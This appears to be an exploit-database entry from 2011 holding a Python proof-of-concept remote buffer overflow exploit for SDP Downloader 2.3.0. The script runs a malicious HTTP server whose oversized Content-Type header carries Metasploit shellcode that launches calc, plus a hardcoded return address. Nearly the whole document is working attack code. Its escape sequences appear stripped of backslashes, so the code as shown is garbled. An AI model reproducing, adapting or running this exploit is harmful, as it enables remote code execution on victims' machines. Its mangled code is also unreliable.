SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit
# Published : 2011-01-30
# Author : sup3r
# Previous Title : Tandberg E, EX and C Series Endpoints Default Credentials for Root Account
# Next Title : Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download

#!/usr/bin/python
#Bug : SDP Downloader (http_response) Remote Buffer Overflow Exploit
# by: sup3r
#Tested on : Xp sp3
#http://sdp.ppona.com/

from socket import *

# win32_exec -  EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71"
"xf3x2ax67x83xebxfcxe2xf4x8dx1bx6ex67x71xf3xa1x22"
"x4dx78x56x62x09xf2xc5xecx3exebxa1x38x51xf2xc1x2e"
"xfaxc7xa1x66x9fxc2xeaxfexddx77xeax13x76x32xe0x6a"
"x70x31xc1x93x4axa7x0ex63x04x16xa1x38x55xf2xc1x01"
"xfaxffx61xecx2exefx2bx8cxfaxefxa1x66x9ax7ax76x43"
"x75x30x1bxa7x15x78x6ax57xf4x33x52x6bxfaxb3x26xec"
"x01xefx87xecx19xfbxc1x6exfax73x9ax67x71xf3xa1x0f"
"x4dxacx1bx91x11xa5xa3x9fxf2x33x51x37x19x8dxf2x85"
"x02x9bxb2x99xfbxfdx7dx98x96x90x4bx0bx12xf3x2ax67")

buffer =  'x41'*4
buffer += shellcode
buffer += 'x41'*(65584-len(shellcode))
buffer += 'xF0xF1xABx00'	
#00ABF1F0(shellcode address)
buffer += 'x41'*36
buffer += 'xBCxEBx12x00'	
#0012EBBC Stack section (writable)
buffer += 'x43'*9000

header=(
"HTTP/1.1 200 OKrn"
"Content-Type: video/"+buffer+"rn"
"Last-Modified: 20 Mar 2010 09:50:10 GMTrn"
"Accept-Ranges: bytesrn"
"ETag: "075a1fc3d4dc41:0"rn"
"Server: Microsoft-IIS/7.5rn"
"X-Powered-By: ASP.NETrn"
"Date: Sat, 20 Mar 2010 14:31:46 GMTrn"
"Connection: closern"
"Content-Length: 324rnrn")

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on [HTTP] 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(header)
c.send(header)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()